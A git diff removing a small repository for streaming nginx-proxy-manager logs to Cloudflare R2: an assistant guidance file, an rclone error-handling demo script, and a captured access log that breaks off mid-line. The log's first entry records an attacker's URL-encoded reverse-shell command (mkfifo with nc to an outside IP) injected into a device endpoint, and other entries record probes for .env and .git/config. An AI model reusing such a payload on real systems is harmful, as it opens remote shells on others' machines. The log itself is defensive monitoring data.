diff --git a/CLAUDE.md b/CLAUDE.md deleted file mode 100644 index 68b4a7e..0000000 --- a/CLAUDE.md +++ /dev/null @@ -1,123 +0,0 @@ -# CLAUDE.md - -This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository. - -## Project Overview - -This is a utility collection for managing nginx-proxy-manager log streaming to Cloudflare R2 storage. The project contains bash scripts and configuration helpers for setting up real-time log monitoring and upload systems, particularly designed for integration with CrowdSec security analysis. - -## Key Components - -### Log Upload Utilities (`upload_log_file_fixed.sh`) - -Core functionality for reliable file uploads to Cloudflare R2 using rclone: - -- **`upload_log_file()`** - Robust upload function with retry logic and proper error handling -- **`upload_log_file_minimal()`** - Simplified version focusing on exit code checking -- **`monitor_and_upload_logs()`** - Continuous monitoring loop for log directory surveillance -- **`test_rclone_upload()`** - Validation function for rclone configuration testing - -**Key Implementation Details:** -- Uses rclone exit codes (0=success) rather than parsing output text for reliability -- Implements exponential backoff retry mechanism with configurable attempts -- Includes timeout protection (300s default) to prevent hanging operations -- Captures both stdout/stderr for detailed error reporting when failures occur - -### Error Handling Patterns (`error_handling_comparison.sh`) - -Documentation and examples showing: -- Common anti-patterns when working with rclone output parsing -- Why checking exit codes is more reliable than parsing "Transferred: X/Y" messages -- Best practices for monitoring loop stability (don't exit on individual upload failures) - -## Remote Server Integration - -The scripts are designed to work with a remote nginx-proxy-manager setup running in Podman containers on Debian systems. The typical deployment includes: - -- **System tuning**: Kernel parameters optimized for container workloads and proxy traffic -- **Log streaming**: Real-time extraction from Podman containers and systemd journals -- **R2 integration**: Direct upload of uncompressed log files for CrowdSec consumption -- **Service automation**: systemd user services for continuous operation - -## Development Commands - -### Testing rclone Configuration -```bash -# Test basic upload functionality -./upload_log_file_fixed.sh - -# Source the functions for interactive testing -source upload_log_file_fixed.sh -upload_log_file "/path/to/logfile" "cloudflare-r2:bucket/path" -``` - -### Remote Server Management -When working with the remote server deployment: - -```bash -# Test log streaming script -ssh user@server "/home/user/scripts/npm-log-streamer.sh test" - -# Manual log sync -ssh user@server "/home/user/scripts/npm-log-streamer.sh sync" - -# Check service status -ssh user@server "systemctl --user status npm-log-streamer.service" - -# View streaming logs -ssh user@server "journalctl --user -u npm-log-streamer.service -f" -``` - -### Cloudflare R2 Operations -```bash -# List uploaded files -rclone ls cloudflare-r2:npm-logs/ - -# Test connection -rclone lsd cloudflare-r2: - -# Manual file upload -rclone copy localfile.log cloudflare-r2:npm-logs/path/ -``` - -## Architecture Considerations - -### Reliability Design -- **Fail-safe monitoring**: Individual upload failures don't terminate the monitoring service -- **Retry mechanisms**: Built-in exponential backoff for transient network issues -- **Timeout handling**: Prevents indefinite hangs on network problems -- **Resource cleanup**: Automatic cleanup of temporary files and connections - -### Integration Points -- **Podman containers**: Log extraction from running nginx-proxy-manager containers -- **systemd integration**: User-level services for automatic startup and restart -- **CrowdSec compatibility**: Uncompressed log files uploaded in real-time for security analysis -- **R2 bucket organization**: Hierarchical structure with hostname/date organization - -### Performance Characteristics -- **Upload frequency**: 1-minute intervals for real-time log availability -- **Batch processing**: Multiple log files processed in single sync cycle -- **Memory efficiency**: Streaming operations avoid large memory buffers -- **Network optimization**: Configurable retry counts and timeout values - -## Troubleshooting - -### Common Issues -- **TLS handshake failures**: Usually indicate incorrect R2 credentials or endpoint configuration -- **Exit code 126**: Typically permissions issues with script execution -- **Service restart loops**: Often caused by missing dependencies or configuration errors - -### Debugging Commands -```bash -# Check rclone configuration -rclone config show cloudflare-r2 - -# Test direct R2 connection -rclone lsd cloudflare-r2: --verbose - -# Verify systemd service configuration -systemctl --user status npm-log-streamer.service --no-pager - -# Check recent service logs -journalctl --user -u npm-log-streamer.service --since "1 hour ago" -``` \ No newline at end of file diff --git a/README.md b/README.md deleted file mode 100644 index 316fab3..0000000 --- a/README.md +++ /dev/null @@ -1 +0,0 @@ -# Nginx Proxy Manager Logs diff --git a/error_handling_comparison.sh b/error_handling_comparison.sh deleted file mode 100644 index 7a969c2..0000000 --- a/error_handling_comparison.sh +++ /dev/null @@ -1,78 +0,0 @@ -#!/bin/bash - -echo "=== RCLONE ERROR HANDLING COMPARISON ===" -echo - -# ❌ PROBLEMATIC APPROACH (what you might have been doing) -echo "❌ PROBLEMATIC APPROACH:" -echo "---" -cat << 'EOF' -upload_log_file_problematic() { - local source_file="$1" - local dest_path="$2" - - # WRONG: Parsing output instead of checking exit code - local output=$(rclone copyto "$source_file" "$dest_path" 2>&1) - - if [[ "$output" =~ "Transferred: 0 / 1, 0%" ]]; then - echo "Upload failed!" # This is WRONG - 0% can mean success! - return 1 - elif [[ "$output" =~ "error" ]] || [[ "$output" =~ "failed" ]]; then - echo "Upload failed!" - return 1 - else - echo "Upload successful" - return 0 - fi -} -EOF - -echo -echo "Problems with this approach:" -echo "• Relies on parsing text output which can be misleading" -echo "• 'Transferred: 0 / 1, 0%' appears even for successful uploads" -echo "• Ignores rclone's actual exit code" -echo "• Fragile - breaks if rclone changes output format" -echo - -# ✅ CORRECT APPROACH -echo "✅ CORRECT APPROACH:" -echo "---" -cat << 'EOF' -upload_log_file_correct() { - local source_file="$1" - local dest_path="$2" - - echo "Uploading $(basename "$source_file")..." - - # CORRECT: Check rclone's exit code directly - if rclone copyto "$source_file" "$dest_path" \ - --retries=2 \ - --timeout=300s \ - --progress; then - # Exit code 0 = success - echo "✅ Upload successful" - return 0 - else - # Non-zero exit code = failure - local exit_code=$? - echo "❌ Upload failed (exit code: $exit_code)" - return $exit_code - fi -} -EOF - -echo -echo "Why this approach works:" -echo "• Uses rclone's exit code (0=success, non-zero=failure)" -echo "• Reliable regardless of output text format" -echo "• Follows Unix convention for command success/failure" -echo "• Built-in retry mechanism" -echo - -echo "=== KEY TAKEAWAYS ===" -echo "1. Always check EXIT CODES, not output text" -echo "2. rclone exit code 0 = success, anything else = failure" -echo "3. Progress output like 'Transferred: 0 / 1, 0%' can appear for successful uploads" -echo "4. Use proper error handling with retries and timeouts" -echo "5. Don't exit monitoring loops on upload failures - retry in next cycle" \ No newline at end of file diff --git a/logs/2025-09-11/fallback_access.log b/logs/2025-09-11/fallback_access.log deleted file mode 100644 index dc755c7..0000000 --- a/logs/2025-09-11/fallback_access.log +++ /dev/null @@ -1,209 +0,0 @@ -[10/Sep/2025:07:27:12 +0000] 404 - POST http 172.237.28.60 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" -[10/Sep/2025:07:35:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:35:33 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:42:46 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:07:51:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:08:23:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:08:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:08:24:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[10/Sep/2025:08:33:14 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:01:08 +0000] 404 - GET http 84167165-jh888-17.tcr195p888.com "/login" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:06:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:09:09:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:32:40 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:34:50 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:34:51 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:39:31 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:40:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:46:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:46:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:57:39 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:09:57:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:10:04:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:08:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:10:33:15 +0000] 403 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 150] [Gzip -] "libwww-perl/6.79" "-" -[10/Sep/2025:10:54:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:55:58 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:10:58:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:10:58:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:25 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:11:13:45 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:13:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:55 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:16:25 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:11:18:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[10/Sep/2025:11:23:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:11:30:45 +0000] 404 - GET http 172.237.28.60 "/portal/redlion" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:11:56:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:56:16 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[10/Sep/2025:12:03:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:07:32 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[10/Sep/2025:12:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:25:02 +0000] 404 - GET http 172.237.28.60 "/webui/" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" "-" -[10/Sep/2025:12:26:51 +0000] 404 - GET http 172.237.28.60 "/geoserver/web/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:28:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:12:30:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:43:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:00:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:23:16 +0000] 404 - GET http 172.237.28.60 "/actuator/health" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:13:36:48 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:40:03 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:13:40:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:40:37 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:47:48 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:13:47:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:13:48:52 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:14:10:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:44:57 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:14:54:49 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:56:31 +0000] 400 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:14:56:33 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:15:04:03 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:32:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:46:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:15:46:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:00:23 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:16:00:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:16:06:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:31:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:31:40 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:51:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:59:43 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:16:59:55 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:17:22:38 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:17:37:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:05:43 +0000] 400 - GET http 172.237.28.60 "/aaa9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:05:44 +0000] 400 - GET http 172.237.28.60 "/aab9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:17:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/version" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/v1" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:23:23 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:33:38 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:33:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:55 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:43:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:19:10:24 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:19:14:26 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:23:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:31:44 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:19:31:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:19:40:13 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:46:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:51:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:51:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:44 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:56:07 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:19:56:10 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:20:06:06 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:06:06 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:18:50 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:20:18:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:20:26:46 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:26:47 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:30:38 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:13:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] 